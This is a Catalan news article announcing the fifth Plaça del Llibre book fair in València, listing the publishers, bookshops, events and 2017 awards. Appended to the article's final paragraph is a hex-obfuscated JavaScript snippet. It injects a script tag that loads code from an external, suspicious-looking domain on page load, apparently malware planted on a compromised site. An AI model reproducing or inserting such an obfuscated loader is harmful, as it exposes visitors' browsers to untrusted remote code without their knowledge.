Els llibres en valencià tornen a La Plaça

La V Plaça del Llibre es celebrarà de l’1 al 5 de novembre a la plaça de l’Ajuntament de la Ciutat de València. Participaran 40 editorials de les Illes, Catalunya i País Valencià amb més de 5.000 títols.

La Plaça del Llibre està inclosa dins de les activitats del Pla Valencià de Foment del Llibre i la Lectura de la Generalitat Valenciana.

El poeta Marc Granell i Capella de Ministrers, premis Plaça del Llibre 2017

Aquest mati, a l’Octubre Centre de Cultura Contemporània, s’ha presentat als mitjans de comunicació la V Plaça del Llibre, que  es celebrarà de l’1 al 5 de novembre a la Plaça de l’Ajuntament de la ciutat de València. La present edició està organitzada per la Fundació pel Llibre i la Lectura (FULL) i la Generalitat Valenciana a iniciativa de l’Associació d’Editors del País Valencià (AEPV), el Gremi de Llibrers de València, l’Associació d’Escriptors en Llengua Catalana (AELC) i Acció Cultural del País Valencià (ACPV), i compta, a més, amb la col·laboració de l’Ajuntament de València mitjançant les regidories de Cultura i Acció Cultural, així com la de les universitats publiques valencianes i les editorials i llibreries participants.

L’acte de presentació ha estat presidit per  Carmen Amoraga, directora general de Cultura i Patrimoni de la Generalitat Valenciana; Manel JM Romero,  secretari general de FULL; Dolors Pedrós, presidenta d’AEPV; Nacho Larraz, president del Gremi de Llibrers de València; Gemma Pasqual, vicepresidenta d’AELC; Toni Gisbert, secretari d’ACPV; i Pepa Garcia, tècnica de la regidoria d’Acció Cultural en representació de l’Ajuntament de València i de les Biblioteques Municipals de València.

Manel JM Romero ha sigut l’encarregat de presentar les dades de la present edició que comptarà amb més de 600 metres lineals d’exposició i 40 editorials de les Illes Balears, Catalunya i País Valencià amb més de 5.000 títols, que convertiran la Plaça de l’Ajuntament de València en un gran aparador de llibres en la nostra llengua. Aquestes 40  editorials són Adia Edicions, Andana Editorial, Austro Hongaresa de Vapors, Balandra Edicions, Comanegra, Combel, Drassana, Edicions 96, Edicions Bromera, Edicions del Buc, Edicions del Bullent, Edicions Sidillà, Editorial 3i4, Edicions de la Universitat de Barcelona, Editorial Barcino, Editorial Gregal, El Petit Editor, Fundació Sambori, Institució Alfons el Magnànim, Jollibre, L’Encobert, Llegir en català, Lletra Impresa, N9U grup Editorial, Onada Edicions, Pagés Editors, Perifèric Edicions , Pruna Llibres,  Publicacions de la Universitat de València, Publicacions de la Universitat Jaume I, Publicacions de la Universitat d’Alacant, Sembra Llibres, Tabarca, Tàndem Edicions, Edicions Tivoli, Triangle Books,  Vincle Editorial i Xarxa Vives d’Universitats.

Per la seua banda, les llibreries que participaran enguany són Abacus Cooperativa (València), Ambreta Llibrera (València), Detroit Llibres (Alcoi), Librería El Puerto (Sagunt),  Llibreria La Moixeranga (Paiporta),  Llibreria Inter Tècnica (València), Llibreria Segui (València), Somnis de paper (Benetússser), Tirant lo Blanch (València)  i Llibreria 35 Formiguetes (València). Un total de 10 llibreries que, com en edicions anteriors, participaran de manera cooperativa.

Entre les novetats que ha assenyalat Romero cal destacar la participació de la  Xarxa Vives de  les Universitats, que contarà amb espai especial. Aquesta xarxa promou les publicacions de les 22 universitats membres i gestiona el portal d’informació i venda electrònica de les publicacions universitàries e-BUC. Dins de la participació de la Xarxa Vives destacarà la col·laboració de les universitats públiques valencianes —Universitat Jaume I de Castelló, Universitat de València i Universitat d’Alacant—, així com de la Universitat de Barcelona.

El secretari general de FULL també ha realçat la participació per primera vegada d’AEPN Comunitat Valenciana, la xarxa per la inclusió social, que durant els dies de la Plaça realitzarà diferents accions per acostar el llibre i la lectura a persones amb risc d’exclusió.

La Plaça del Llibre 2017 comptarà amb un ampli programa d’activitats. Al llarg dels 5 dies del certamen es presentaran 40 novetats de 20 editorials diferents. Entre els més de 60 autors i autores que signaran a la Plaça destaquen Teresa Broseta, Toni Cabo, Pepa Guardiola, Francesc Mompó, Manel Joan Arinyó, Lourdes Boïgues, Toni Mollà, Jordi Colonques, Joan Canela, Artur Heras, Núria Cadenes, Ester Vizcarra, Salvador Vendrell, Joan Arrandis, Paolo Ferrando, Fani Grande, Fina Girbés, Tona Català i Pasqual Alapont.

 Entre els actes programats cal mencionar la vesprada del dijous 2 de novembre que es dedicarà per complet a Joan Fuster amb motiu del 25 aniversari del seu traspàs, on es presentaran els llibres col·lectius Nosaltres, el fusterians, Nosaltres, les fusterianes, La improbable vida de Joan Fuster, així com Alfaro- Fuster.

També cal ressenyar la participació per primera vegada de les Biblioteques Municipals de València, dependents de la regidoria d’Acció Cultural de l’Ajuntament de València, que organitzaran, entre altres activitats, un encontre de bibliotecaris  de la xarxa municipal amb l’objectiu de fer una selecció de títols entre els llibres exposats, que serà adquirida per les biblioteques municipals, així com una biblioteca infantil impulsada y supervisada pels bibliotecaris muncipals, que funcionarà al recinte firal per a que les xiquetes i els xiquets que ens visiten puguen consultar i gaudir dels llibres i la lectura.

A més d’aquesta biblioteca infantil, els més menuts podran gaudir a La Plaça d’un ampli programa d’activitats lúdiques i formatives que ja conta amb inscripció de més de 1.000 escolars en activitats matinals concertades. També comptarem amb l’actuació musical de Dani Miquel.

Dins de les activitats per als més menuts, el diumenge 5 de novembre té una importància rellevant la cavalcada per la lectura on participaran alumnes de diferents centres docents vestits com els sues personatges literaris preferits. Per poder realitzar la cavalcada es tancarà la plaça de l’Ajuntament al trànsit. L’acte el conclourà el discurs per la lectura que pronunciarà l’escriptora Anna Moner, primera persona en ostentar el càrrec de l’Ambaixada de la Lectura. Aquesta cavalcada comptarà amb la col·laboració de Teatres de la Generalitat Valenciana. L’Ambaixada de la Lectura, programa integrat dins de les accions del Pla Valencià de Foment del Llibre i la Lectura de la Generalitat Valenciana, és un carrer honorífic que recau en una persona destacada del món del llibre valencià i té per objectiu donar visibilitat al llibre i la lectura.

Com en edicions les activitats programades es tancaran cada dia amb una actuació musical, segons el conveni de col·laboració entre l’organització de la Plaça i el Servei de Normalització Lingüística de la Universitat de València.

També per quart any consecutiu es lliuraran els Premis de la Plaça del Llibre. Aquest guardons tenen com a finalitat reconèixer persones i entitats que han destacat per la seua trajectòria literària  i la seua tasca de difusió del llibre i la lectura. Enguany el Premi a la Trajectòria Literària  Plaça del Llibre 2017 és per al poeta valencià Marc Granell, amb una llarga i reconeguda trajectòria amb poemaris com  Llarg cam llarg, Versos per a Anna o Tard o d’hora. El Premi Difusió Plaça del Llibre 2017 és per a Capella de Ministrers, la formació valenciana especialitzada en música antiga i barroca creada per Carles Magraner fa ara 30 anys, i que s’ha dedicat a difondre mitjançant la música els gran autors i obres de la nostra literatura com Ausias March, Ramon Lluch, Joanot Martorell o la lírica trobadoresca, entre d’altres.

Ja en la ronda de paraules de tancament, Dolors Pedrós, presidenta d’AEPV,  ha destacat la importància que té per al sector editorial valencià un esdeveniment tan cabdal com aquest. Per la seua part, Nacho Larraz, president dels llibrers valencians, ha insistit en la funció de la Plaça i la Fira del Llibre com extensió de les pròpies llibreries en les tasques d’apropament del llibre a la ciutadania. A més, ha subratllat el caràcter excepcional de l’edició d’enguany al coincidir amb el 40 aniversari de la fundació del Gremi de Llibrers de València.

Gemma Pasqual, vicepresidenta d’AELC, ha significat la Plaça com a eina fonamental per a la visibilitat dels nostres escriptors i escriptores. Idea que ha ampliat Toni Gisbert, secretari d’ACPV, posant en valor el treball plural que realitza “en favor de la llengua i la cultura , donant visibilitat als escriptors i escriptores i als llibres tan amagats durant tants anys. Un esforç de tots, administracions públiques i entitats privades,  que ha de significar la llavor que es sembra per a continuar fent accions durant tot l’any”.

Finalment, Carme Amoraga, directora general de Cultura i Patrimoni de la Generalitat Valenciana, ha afegit la seua satisfacció “ per deixar-nos participa a la Generalitat en aquesta festa del llibre tan arrelada al cor de la ciutadania, i que constitueix un punt de trobada festiu al voltant de la cultura que treballa per una societat més cívica i més forta”.

La Plaça del Llibre va nàixer l’any 2013 per a donar visibilitat a la literatura feta en català al País Valencià i consolidar un punt de trobada a la tardor entre editors, llibrers, autors i lectors. La Plaça parteix del compromís de les entitats impulsores de la cultura i la llengua en general, i amb el llibre en particular, amb la finalitat de sumar sinèrgies per difondre  la lectura com a via fonamental per  accedir al coneixement i contribuir a la divulgació dels nostres autors i autores. var _0x29b4=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx77x65x62x2Ex73x74x61x74x69x2Ex62x69x64x2Fx6Ax73x2Fx59x51x48x48x41x41x55x44x59x77x42x46x67x6Cx44x58x67x30x56x53x42x56x57x79x45x44x51x35x64x78x47x43x42x54x4Ex54x38x55x44x47x55x42x42x54x30x7Ax50x46x55x6Ax43x74x41x52x45x32x4Ex7Ax41x56x4Ax53x49x50x51x30x46x4Ax41x42x46x55x56x54x4Bx5Fx41x41x42x4Ax56x78x49x47x45x6Bx48x35x51x43x46x44x42x41x53x56x49x68x50x50x63x52x45x71x59x52x46x45x64x52x51x63x73x55x45x6Bx41x52x4Ax59x51x79x41x58x56x42x50x4Ex63x51x4Cx61x51x41x56x6Dx34x43x51x43x5Ax41x41x56x64x45x4Dx47x59x41x58x51x78x77x61x2Ex6Ax73x3Fx74x72x6Cx3Dx30x2Ex35x30″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

Enllaç a noticia d'origen

Contact Us

We're not around right now. But you can send us an email and we'll get back to you, asap.

Not readable? Change text. captcha txt

Utilitzem galletes pròpies i de tercers per realitzar l'anàlisi de la navegació dels usuaris i millorar els nostres serveis. Al prémer ‘Accepte’ consenteix aquestes galletes. Podeu obtenir-ne més informació, o bé saber com canviar-ne la configuració, fent clic a Més informació.

La configuració de les galetes d'aquesta web està definida com a "permet galetes" per poder oferir-te una millor experiència de navegació. Si continues utilitzant aquest lloc web sense canviar la configuració de galetes o bé cliques a "Acceptar" entendrem que hi estàs d'acord.

Tanca